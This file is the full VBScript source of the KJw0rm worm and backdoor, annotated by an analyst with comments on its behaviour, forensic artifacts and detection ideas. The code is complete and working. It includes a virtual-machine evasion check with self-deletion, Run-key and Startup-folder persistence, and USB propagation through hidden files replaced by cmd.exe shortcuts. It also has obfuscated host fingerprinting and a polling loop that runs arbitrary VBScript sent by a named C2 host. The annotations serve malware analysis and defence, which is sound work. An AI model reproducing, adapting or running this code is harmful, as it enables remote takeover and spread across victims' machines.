Kjworm.vbs
'MrLi0nHere
'KJw0rm
'Thanx njq8
' Analyst overview (derived from the code in this file): a VBScript worm/backdoor
' that labels itself "KJw0rm". The top-level code fingerprints the host, runs a
' virtual-machine check, installs itself (ins/xins), then polls a remote HTTP
' server forever and acts on the reply.
' Errors at this level are suppressed, so failed steps leave no visible prompt.
On Error Resume Next
dim sh ' shell
set sh =WScript.CreateObject("WScript.Shell")
dim fs ' filesystem
set fs= CreateObject("Scripting.FileSystemObject")
' dotnet is "Yes" when the .NET 2.0 VB compiler (vbc.exe) exists on disk; the value
' is only reported to the server through inf().
dim dotnet
dotnet="No"
if fs.fileexists(sh.ExpandEnvironmentStrings("%windir%") & "\Microsoft.NET\Framework\v2.0.50727\vbc.exe") then
dotnet="Yes"
end if
' Runs before any install step; on a host whose product name contains "virtual"
' the script deletes itself and idles (see vmcheck).
vmcheck
' Network indicators: the polling target is host:port over plain HTTP (see post).
dim host
host= "redtubkof.ddns.net"
dim port
port=1010
' Host indicators: DR & FN is the installed copy, %AppData%\System.vbs.
dim DR
DR = sh.ExpandEnvironmentStrings("%AppData%") & "\"
dim FN
FN ="System.vbs"
' fh holds the text-file handle that ins opens on the installed copy.
dim fh
' us starts as the sentinel "~"; ins replaces it with the value stored in HKCU\KJ.
dim us
us="~"
ins
' spl is the field separator expected in server replies: <command>KsKsK<argument>.
dim spl
spl="KsKsK"
dim i
i=0
' Polling loop: POST to /ready, split the reply, dispatch on the first field.
while true
dim a
a= split(post("ready",""),spl)
select case a(0)
' "exc": the second field is run as VBScript source through Execute, so the server
' can run arbitrary code in this wscript/cscript process.
case "exc"
dim sa
sa= a(1)
execute sa
' "uns": remove the installation and exit (see uns).
case "uns"
uns ""
end select
' 4-second poll interval; after every third poll xins is re-run, which rewrites the
' Run values, the Startup copy and the removable-drive copies if they were removed.
wscript.sleep 4000
i = i + 1
if i> 2 then
i=0
xins
end if
wend
' vmcheck: virtual-machine check based on a single WMI property.
' Reads Win32_ComputerSystemProduct; if any instance's Name contains "virtual"
' (case-insensitive) the script deletes its own file and then sleeps forever
' without reaching the install or network code.
' Analysis note: on such a host a sandbox run shows only the self-deletion and an
' idle script-host process, so an empty behaviour report is not evidence that the
' sample is benign.
function vmcheck()
On Error Resume Next
Set WMI = GetObject("WinMgmts:")
Set Col = WMI.ExecQuery("Select * from Win32_ComputerSystemProduct")
For Each Ob in Col
if instr( lcase( ob.name),"virtual") >0 then
On Error Resume Next
' Remove the script from disk, then park the process in an endless 1-second sleep.
fs.deletefile(wscript.scriptfullname)
do
wscript.sleep(1000)
loop
end if
next
end Function
' ins: first-run installation.
' 1. Reads HKCU\KJ into us. When the value does not exist the read fails, the
'    error is suppressed and us keeps its "~" sentinel.
' 2. On that first run it records "Yes" if the script is running as
'    <drive>:\System.vbs (a drive root) and "No" otherwise, and stores the result
'    in HKCU\KJ. Presumably this marks whether the host was reached through an
'    infected drive; the value is sent to the server by inf().
' 3. Copies itself to %AppData%\System.vbs and opens that copy for appending,
'    keeping the handle in the global fh.
' 4. Quits if the copy or the open raised an error; otherwise calls xins.
' Forensic artifacts: registry value HKCU\KJ ("Yes"/"No") and %AppData%\System.vbs.
function ins
on error resume next
us= sh.regread("HKCU\KJ")
if us="~" then
' mid(...,2) drops the drive letter, so this compares against ":\system.vbs".
if lcase( mid(wscript.scriptfullname,2))=":\" & lcase(fn) then
us="Yes"
sh.regwrite "HKCU\KJ", us, "REG_SZ"
else
us="No"
sh.regwrite "HKCU\KJ", us, "REG_SZ"
end if
end if
' Clear the expected registry-read error so that only the copy/open below is checked.
Err.Clear
fs.CopyFile wscript.scriptfullname,dr & fn ,true
' Mode 8 = append, create=false. NOTE(review): the handle is never written to in this
' file; it looks like it is held only to keep the file open. Confirm dynamically.
set fh = fs.OpenTextFile( dr & fn, 8, false)
if Err.Number>0 then
wscript.quit
end if
xins
end function
' xins: persistence and removable-drive propagation. Called once from ins and
' again from the main loop after every third poll.
' Persistence artifacts:
'   - Run value "System.vbs" under HKCU and HKLM ...\CurrentVersion\Run, pointing at
'     the quoted %AppData%\System.vbs path.
'   - A copy of the script in the folder returned by Shell.Application
'     NameSpace(&H7) (the user's Startup folder).
' Removable-drive artifacts (drives that are ready, have free space and report
' DriveType 1):
'   - System.vbs in the drive root.
'   - Up to 20 root files and up to 20 root folders given Attributes = 2 (hidden),
'     each paired with "<name>.lnk" whose target is cmd.exe and whose arguments
'     start System.vbs first and then open the original item.
'   - A "Videos" folder created in the drive root.
' Detection idea: .lnk files in a removable-drive root with TargetPath cmd.exe and
' arguments beginning "/c start System.vbs", next to hidden originals of the same name.
sub xins
on error resume next
sh.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\" & fn, chrw(34) & dr & fn & chrw(34), "REG_SZ"
sh.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\" & fn, chrw(34) & dr & fn & chrw(34), "REG_SZ"
fs.copyfile wscript.scriptfullname, CreateObject("Shell.Application").NameSpace(&H7).Self.Path &"\" & fn ,true
for each xx in fs.Drives
if xx.isready then
if xx.FreeSpace >0 then
' DriveType 1 is "Removable" in the FileSystemObject model.
if xx.drivetype=1 then
' Clear the attributes of an existing copy so that it can be overwritten.
if fs.fileexists(xx.path & "\" & fn) then
fs.getfile(xx.path & "\" & fn).Attributes=0
end if
fs.copyfile dr & fn , xx.path & "\" & fn,true
' mx counts shortcuts created; the loop stops after 20.
dim mx
mx=0
for Each x In fs.GetFolder( xx.path & "\" ).Files
if mx=20 then
exit for
end if
wscript.sleep 1
' Only files that have an extension other than "lnk" are processed.
if instr(x.name,".") Then
if lcase( Split(x.name, ".")(UBound(Split(x.name, "."))))<>"lnk" Then
' Hide the file. This also hides the dropped System.vbs copy, which gets no shortcut.
x.Attributes = 2
if ucase(x.name) <> ucase(fn) Then
mx =mx +1
' Shortcut named after the original file: WindowStyle 7 runs cmd.exe minimized.
With sh.CreateShortcut(xx.path & "\" & x.name & ".lnk")
.TargetPath = "cmd.exe"
.WorkingDirectory = ""
.WindowStyle=7
.Arguments = "/c start " & Replace(fn," ", ChrW(34) _
& " " & ChrW(34)) & "&start " & replace( x.name," ", ChrW(34) & " " & ChrW(34)) & " & exit"
' The icon is read from the DefaultIcon registered for the file's extension, so the
' shortcut looks like the file it replaces.
.IconLocation = sh.regread("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\" & sh.regread("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\." & Split(x.name, ".")(UBound(Split(x.name, "."))) & "\") & "\DefaultIcon\")
if instr( .iconlocation,",")=0 then
.iconlocation = .iconlocation &",0"
end if
.Save()
end with
end if
end if
end if
Next
mx=0
fs.CreateFolder(xx.path & "\Videos\" )
' Same treatment for up to 20 root folders: hide the folder, leave a shortcut.
for Each x In fs.GetFolder( xx.path & "\" ).SubFolders
if mx=20 then
exit for
end if
wscript.sleep 1
x.Attributes = 2
mx =mx +1
With sh.CreateShortcut(xx.path & "\" & x.name & ".lnk")
.TargetPath = "cmd.exe"
.WorkingDirectory = ""
.WindowStyle=7
.Arguments = "/c start " & Replace(fn," ", ChrW(34)& " " & ChrW(34)) & "&start explorer /root,%CD%" & replace( x.name," ", ChrW(34) & " " & ChrW(34)) & "& exit"
' Fixed icon from SHELL32.dll (index 3, presumably the folder icon; confirm on the target OS).
.IconLocation = "%windir%\system32\SHELL32.dll,3"
.Save()
end with
Next
end if
end if
end if
next
Err.Clear
end sub
' uns(ex): the sample's own uninstall routine, reached through the "uns" server command.
' Steps visible here:
'   - Closes the handles fi and fh (fi is not assigned anywhere in this file).
'   - Deletes the two Run values, the %AppData% copy and the Startup-folder copy.
'   - On every ready drive with free space (not only removable ones): resets the
'     attributes of root files and folders to 0, deletes the matching "<name>.lnk"
'     files, and deletes a root copy of System.vbs.
'   - Waits up to 10 seconds on w.readystate (w is not defined in this file).
'   - If ex is non-empty, starts it through a hidden cmd.exe, then quits.
' Forensic note: the HKCU\KJ value and the "Videos" folder created by xins are not
' removed here, so they can remain after a remote uninstall.
' Remediation note: the same list (Run values, the two copies, the .lnk files and
' the hidden attributes) is what a manual cleanup has to cover.
function uns(ex)
on error resume Next
fi.close
fh.close
sh.RegDelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & FN
sh.RegDelete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\" & FN
fs.DeleteFile dr & fn ,true
fs.DeleteFile CreateObject("Shell.Application").NameSpace(&H7).Self.Path &"\" & FN ,True
for each xx in fs.Drives
if xx.isready then
if xx.FreeSpace >0 then
For Each x In fs.GetFolder( xx.path & "\").Files
On Error Resume Next
if instr(x.name,".") then
if lcase( Split(x.name, ".")(UBound(Split(x.name, "."))))<>"lnk" then
' Un-hide the original file, then remove its shortcut (or the worm copy itself).
x.Attributes = 0
if ucase(x.name) <> ucase(fn) then
fs.deletefile(xx.path & "\" & x.name & ".lnk" )
else
fs.deletefile( xx.path & "\" & x.name )
end if
end if
end If
Next
For Each x In fs.GetFolder( xx.path & "\").SubFolders
On Error Resume Next
if fs.fileexists( xx.Path & "\" & x.Name &".lnk") then
fs.deletefile(xx.path & "\" & x.name & ".lnk" )
end if
x.Attributes = 0
Next
end if
end if
Next
Dim tout
tout=0
Do until w.readystate=4
wscript.sleep(1000)
tout =tout + 1
If tout=10 Then Exit do
Loop
' Window style 0 = hidden. "ping 0" is presumably used as a short delay before ex is started.
if ex<>"" then
sh.Run "cmd.exe /c ping 0&start " & ex,0, false
end if
wscript.quit
end function
' post(cmd, da): one synchronous HTTP request to the server.
'   cmd - path segment appended to http://<host>:<port>/ (the main loop sends "ready").
'   da  - request body.
' Returns the response body as text, or "" if nothing was assigned.
' The request carries a header whose name is the literal string "User-Agent:" (colon
' included) and whose value is the host-profile string built by inf().
' Detection idea: a script host (wscript/cscript) sending periodic plain-HTTP POSTs
' to /ready on the configured port, with backslash-separated host details in a
' request header.
function post(cmd ,da)
post=""
Dim o
Set o = CreateObject("MSXML2.XMLHTTP")
' Third argument false = synchronous: the call blocks until the server answers.
o.open "POST","http://" & host & ":" & port &"/" & cmd, false
o.setRequestHeader "User-Agent:", inf
o.send da
post=o.responseText
end function
' xinf caches the profile string so that the WMI queries in inf run only once.
dim xinf
' inf: builds the host-profile string sent with every request (see post).
' Fields, joined with "\", in order:
'   HWD() \ %COMPUTERNAME% \ %USERNAME% \ OS description \ OS country code \
'   "0.5X" \ dotnet & nf() \ us \ HWD()
' "0.5X" is a fixed literal, presumably the sample's version tag.
' The chrw(...) expressions are character-code string obfuscation. Evaluated, they are:
'   GetObject moniker : winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2
'   WMI query         : Select * from Win32_OperatingSystem
'   second moniker    : winmgmts:root\cimv2:Win32_Processor='cpu0'
' The plain-text forms of the first moniker and of a similar query appear in HWD, so a
' static signature should not rely on these literal strings alone.
function inf
on error resume next
if xinf="" then
dim s
' Each field is preset to "??" so that the placeholder is kept when a lookup fails.
s="??"
s = hwd
inf = inf & s & "\"
s="??"
s= sh.ExpandEnvironmentStrings("%COMPUTERNAME%")
inf = inf & s & "\"
s="??"
s= sh.ExpandEnvironmentStrings("%USERNAME%")
inf = inf & s & "\"
s="??"
' Obfuscated WMI connection and OS query (decoded in the header comment).
Set szxquzftjy = GetObject( "w" & chrw(cint(33+72)) & "n" & "m" & "g" & "m" & "t" & chrw(cint(124-9)) & ":" & chrw(cint(2.86046511627907 * 43)) & chrw(cint(105)) & chrw(cint(63+46)) & "p" & "e" & chrw(3534 / 31) & chrw(115) & chrw(2775 / 25) & "n" & chrw(87+10) & "t" & "i" & chrw(13+98) & "n" & chrw(76) & "e" & chrw(cint(93+25)) & "e" & chrw(3888 / 36) & "=" & "i" & "m" & "p" & chrw(101) & chrw(3876 / 34) & chrw(115) & "o" & "n" & "a" & chrw(cint(116)) & chrw(cint(101)) & chrw(32 * 3.90625) & chrw(cint(51-18)) & "\" & chrw(6+86) & "." & chrw(cint(71+21)) & chrw(72+42) & "o" & chrw(111) & chrw(116) & chrw(cint(92)) & chrw(17+82) & "i" & chrw(218 / 2) & chrw(139-21) & chrw(300 / 6) )
Set yyotvzirsq = szxquzftjy.ExecQuery ( "S" & "e" & chrw(cint(3 * 36)) & "e" & chrw(107-8) & "t" & chrw(cint(46+-14)) & "*" & chrw(cint(9+23)) & "f" & "r" & "o" & "m" & " " & "W" & chrw(2.28260869565217 * 46) & chrw(102+8) & chrw(2.04 * 25) & "2" & "_" & chrw(32+47) & chrw(112) & chrw(48 * 2.10416666666667) & "r" & "a" & chrw(117-1) & chrw(cint(105 / 1)) & chrw(cint(66+44)) & "g" & chrw(71+12) & chrw(cint(4+117)) & "s" & chrw(cint(116)) & "e" & chrw(1090 / 10) )
dim cstdspjgkz
' First OS instance only: caption + " SP" + service-pack major version, plus the country code.
For Each aaa in yyotvzirsq
jgduwnagqo= aaa.Caption & " " & chrw(82+1) & chrw(14+66) & aaa.ServicePackMajorVersion
cstdspjgkz= aaa.countrycode
exit for
Next
' Shorten the caption: strip "Microsoft", turn "Windows " and " Win" into "Win".
jgduwnagqo= replace(jgduwnagqo, chrw(31+46) & chrw(cint(109-4)) & "c" & "r" & "o" & "s" & "o" & chrw(cint(102)) & "t" ,"")
jgduwnagqo= replace(jgduwnagqo, "W" & chrw(cint(3150 / 30)) & chrw(cint(21 * 5.23809523809524)) & chrw(3700 / 37) & "o" & chrw(101+18) & "s" & chrw(32) , "W" & chrw(20+85) & "n" )
jgduwnagqo= Replace(jgduwnagqo, " " & chrw(21.75 * 4) & "i" & "n" , "W" & chrw(20+85) & "n" )
' Append " x" and the AddressWidth of Win32_Processor 'cpu0'.
jgduwnagqo = jgduwnagqo & chrw(cint(73-41)) & "x" & GetObject( chrw(5950 / 50) & chrw(735 / 7) & "n" & chrw(30+79) & chrw(4.47826086956522 * 23) & "m" & "t" & "s" & chrw(cint(38+20)) & "r" & "o" & "o" & chrw(116) & "\" & "c" & "i" & "m" & "v" & "2" & ":" & "W" & chrw(210 / 2) & "n" & "3" & chrw(1800 / 36) & "_" & chrw(cint(10+70)) & "r" & "o" & chrw(27+72) & chrw(3030 / 30) & chrw(cint(49 * 2.3469387755102)) & chrw(115) & "o" & chrw(cint(124-10)) & "=" & chrw(cint(8+31)) & chrw(99) & chrw(112) & "u" & "0" & "'" ).AddressWidth
inf = inf & jgduwnagqo & "\" & cstdspjgkz &"\0.5X\" & dotnet & nf &"\" & us &"\" & HWD
xinf=inf
else
inf=xinf
end if
end function
' HWD: per-host identifier used as the first and last field of the profile string.
' Returns "KJw0rm_" followed by the first non-empty VolumeSerialNumber reported by
' Win32_LogicalDisk, or the bare string "KJw0rm" when no serial is found or the
' WMI query fails.
' The "KJw0rm" prefix is a constant in this sample and therefore a usable network
' and memory indicator.
function HWD
HWD="KJw0rm"
On Error Resume Next
Set a = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
Set aa = a.ExecQuery("SELECT * FROM Win32_LogicalDisk")
For Each aaa In aa
if aaa.VolumeSerialNumber<>"" then
HWD= "KJw0rm_" & aaa.VolumeSerialNumber
exit for
end if
Next
end function
' nf: reports a .NET Framework version key name.
' Enumerates the subkeys of HKLM\SOFTWARE\Microsoft\.NETFramework\Policy through the
' WMI StdRegProv provider (&H80000002 = HKEY_LOCAL_MACHINE) and returns the last
' subkey name that contains "v". Returns Empty when the enumeration fails or no
' such key exists. The result is appended to the dotnet flag in inf().
Function nf
On Error Resume next
Set oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
Dim aSub, sKey , v
oReg.EnumKey &H80000002,"SOFTWARE\Microsoft\.NETFramework\Policy", aSub
' No early exit: the last matching name in enumeration order wins.
For Each sKey In aSub
If InStr(sKey,"v") > 0 Then
v = sKey
End if
Next
nf = v
End Function